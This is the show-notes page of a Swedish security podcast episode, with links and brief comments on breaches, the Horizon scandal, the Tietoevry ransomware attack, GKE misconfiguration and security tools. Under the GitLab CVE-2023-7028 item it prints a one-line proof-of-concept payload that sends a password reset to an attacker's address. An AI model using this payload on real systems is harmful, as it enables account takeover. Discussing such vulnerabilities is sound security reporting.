Säkerhetspodcasten #255 - Ostrukturerat V.6

Lyssna

• mp3, längd: 59:52

Innehåll

Panelen diskuterar den senaste tidens nyheter.

Mother of all breaches - Alla moders intrång?

Rickard med flera tycker det är lite hype:at.

• Malwarebytes: “The mother of all breaches” - 26 billion records found online
• cybernews: Mother of all breaches reveals 26 billion records - what we know so far
• Troy Hunt: Inside the Massive Naz.API Credential Stuffing List

Mercedes-Benz github token problem

• redhuntlabs: Mercedes-Benz Source Code at Risk - GitHub Token Mishap Sparks Major Security Concerns

Post/Horizon

• Continous Delivery: Developers Blamed For The Post Office Horizon Scandal?
• The Guardian / Alex Hern: How the Post Office’s Horizon system failed: a technical breakdown

“of eight [people] in the development team, two were very good, another two were mediocre but we could work with them, and then there were probably three or four who just weren’t up to it and weren’t capable of producing professional code”

• Wikipedia: British Post Office scandal
• computerweekly: Horizon system EPOSS code writers lacked basic programming skills, public inquiry hears
• The Telegraph: Post Office scandal latest - Fujitsu data was ‘manipulated’, inquiry hears - watch live

Tietoevry

• Tietoevry: Uppdatering om ransomware-attacken i Sverige: Återställningsarbetet fortskrider hos Tietoevry
• ComputerSweden: Efter Tietoevry-attacken – prissänkning på läkemedel skjuts upp
• The Record: Akira ransomware hits cloud service Tietoevry; numerous Swedish customers affected

NATO Quantum Strategy

• NATO: Summary of NATO’s Quantum Technologies Strategy

GitLab

• NVD: CVE-2023-7028 GitLab user account password reset emails could be delivered to an unverified email address
• @rwincey: GitLab CVE-2023-7028 POC

GitLab CVE-2023-7028 POC

user[email][]=valid@email.com&user[email][]=attacker@email.com

- PWNED

GKE Google Kubernetes Engine system:authenticated felkonfigurering

Administratörer som ger bort rättigheter till system:authenticated resulterar i fantastisk säkerhet!

• orca security: Sys:All: How A Simple Loophole in Google Kubernetes Engine Puts Clusters at Risk of Compromise
• orca security: How the Sys:All Loophole Allowed Us To Penetrate GKE Clusters in Production

Tommy Wiseau presenterar 1Password

Mannen känd från storfilmer så som The Room 2003 presenterar ett litet okänt bobolag vid namn 1Password.

• 1Password Commercial - Stopping Bad Actors with @TommyWiseau

PoiEx - Points Of Intersection Explorer

Ett verktyg som visualiserar Infrastructure of Code och kan visa det i Visual Studio:

• github.com/doyensec/PoiEx - Visualize and explore IaC…
• doyensec: Introducing PoIEx - Points Of Intersection Explorer

Det orelaterade verktyget vi snurrade in på snabbt:

• github.com/semgrep/semgrep - Code scanning at ludicrous speed.